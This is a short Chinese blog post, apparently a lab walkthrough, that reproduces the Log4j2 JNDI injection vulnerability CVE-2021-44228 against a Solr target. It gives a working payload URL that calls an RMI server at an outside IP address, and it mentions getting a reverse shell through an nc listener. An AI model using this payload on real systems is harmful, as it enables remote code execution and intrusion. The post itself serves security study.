阿一网络安全之log4j2漏洞CVE-2021-44228复现

漏洞简介

Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

开启靶场

JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务
在 url 中插⼊构造的 payload

http://192.168.121.129:8983/solr/admin/cores?  action=${jndi:rmi://116.62.17.187:1099/qdz3ly}

开启 nc 监听,成功 getshell
其实很简单,大家加油。
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值